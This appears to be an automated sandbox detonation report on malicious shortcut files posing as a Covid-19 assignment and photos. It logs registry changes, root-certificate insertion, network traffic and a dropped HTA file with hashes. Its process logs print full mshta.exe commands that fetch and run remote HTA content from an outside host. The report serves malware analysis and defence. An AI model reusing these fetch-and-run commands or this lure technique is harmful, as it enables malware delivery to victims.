Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1824 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1824 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1824 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Assignment-Covid-19.docx.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.inapharma.in udp
US 162.144.86.32:443 www.inapharma.in tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 162.144.86.32:443 www.inapharma.in tcp
US 162.144.86.32:443 www.inapharma.in tcp

Files

memory/1824-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

58s

Max time network

974s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510223001.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1972 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1972 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1972 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20100510223001.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image2

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1972-54-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win7-20220311-en

Max time kernel

4294901s

Max time network

851s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122317.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1784 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1784 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1784 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 920 wrote to memory of 804 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 920 wrote to memory of 804 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe
PID 920 wrote to memory of 804 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122317.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122317

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1784-54-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp

memory/920-91-0x00000000030B0000-0x00000000030B8000-memory.dmp

memory/920-93-0x000000001D4C7000-0x000000001D4C8000-memory.dmp

memory/920-92-0x000007FEF3700000-0x000007FEF40EC000-memory.dmp

C:\ProgramData\Duolingo\windate.hta

MD5 df0ae835a1dc249c25f56c96a19c63c7
SHA1 388bb0c49057b08a6fc5e7d4fcaab18754650c59
SHA256 7838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512 d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8

Analysis: behavioral24

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-20220310-en

Max time kernel

201s

Max time network

693s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122317.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\svchost.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1512 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1512 wrote to memory of 3472 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122317.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122317

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/3472-135-0x00007FFFEACF0000-0x00007FFFEB7B1000-memory.dmp

memory/3472-136-0x00000123E8196000-0x00000123E8197000-memory.dmp

memory/3668-137-0x000001A315B70000-0x000001A315B80000-memory.dmp

memory/3668-138-0x000001A316560000-0x000001A316570000-memory.dmp

memory/3668-139-0x000001A318AF0000-0x000001A318AF4000-memory.dmp

memory/3668-140-0x000001A318DC0000-0x000001A318DC4000-memory.dmp

memory/3668-141-0x000001A318DA0000-0x000001A318DA1000-memory.dmp

memory/3668-142-0x000001A318B20000-0x000001A318B24000-memory.dmp

memory/3668-143-0x000001A318B10000-0x000001A318B11000-memory.dmp

memory/3668-144-0x000001A318B10000-0x000001A318B14000-memory.dmp

memory/3668-145-0x000001A318A10000-0x000001A318A11000-memory.dmp